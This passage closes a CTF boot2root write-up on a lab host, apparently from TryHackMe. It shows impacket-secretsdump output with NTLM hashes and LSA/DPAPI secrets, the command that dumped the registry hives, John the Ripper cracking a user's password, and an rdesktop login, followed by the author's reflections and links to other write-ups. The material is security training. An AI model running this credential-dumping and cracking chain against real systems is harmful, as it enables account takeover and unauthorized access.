Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdc31ac35e19a18b00b5b066de3e8da898bf8da71
dpapi_userkey:0xfaea7403f42b58e1a5dd35ee816185a953b1c795
[*] NL$KM 
 0000   45 94 4A 93 A2 9D D2 8E  2B CF 5F DF 66 75 59 4C   E.J.....+._.fuYL
 0010   E9 BC B8 91 2C 66 59 1E  BF 53 1E 77 BE C2 9B 74   ....,fY..S.w...t
 0020   73 64 04 B4 56 EA 7D 6F  BA C2 1B 7E F0 BA 53 67   sd..V.}o...~..Sg
 0030   E6 E6 66 84 95 1F 90 60  42 EE 34 0A EE 99 9F 55   ..f....`B.4....U
NL$KM:45944a93a29dd28e2bcf5fdf6675594ce9bcb8912c66591ebf531e77bec29b74736404b456ea7d6fbac21b7ef0ba5367e6e66684951f906042ee340aee999f55
[*] Cleaning up...

root@kali:~/ctf/extractor# impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL | egrep 'Administrator|Guest|Jon' > hash.txt
root@kali:~/ctf/extractor# john -format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2020-11-11 13:43) 2.985g/s 15224Kp/s 15224Kc/s 15231KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Wrapping Up

With the credentials in hand I decided to try my had at a remote desktop session. Which happily gave me access to a desktop.

root@kali:~# rdesktop -u Jon 10.10.87.38

Jon’s PC

Summary

This experience really hammered in how many of the tedious tasks metasploit handles silently. It deals with, assiting in sourcing and packing an exploit, capturing the outputs of scans, handling setting up listeners and catching shells. Additionally, the value that meterpreter provides in stabalizing a shell, transfering files and pivoting is easy to take for granted until it is no longer available. Despite having to do many of those tasks manually, it was massively educational to be forced to read and understand exploit I had attempted and then pivot with the resources only available on the target’s limited shell.

Daily Bugle Boot2Root Write-Up

Nate Catelli
A boot2root writeup of the Daily Bugle host from TryHackMe
November 27, 2020
ctfboot2roothackingwriteuptryhackme

Hackpark Boot2Root Write-Up

Nate Catelli
A boot2root writeup of the Hackpark host from TryHackMe
November 23, 2020
ctfboot2roothackingwriteuptryhackme

Kenobi Boot2Root Write-Up

Nate Catelli
A boot2root writeup of the Kenobi host from TryHackMe
November 14, 2020
ctfboot2roothackingwriteuptryhackme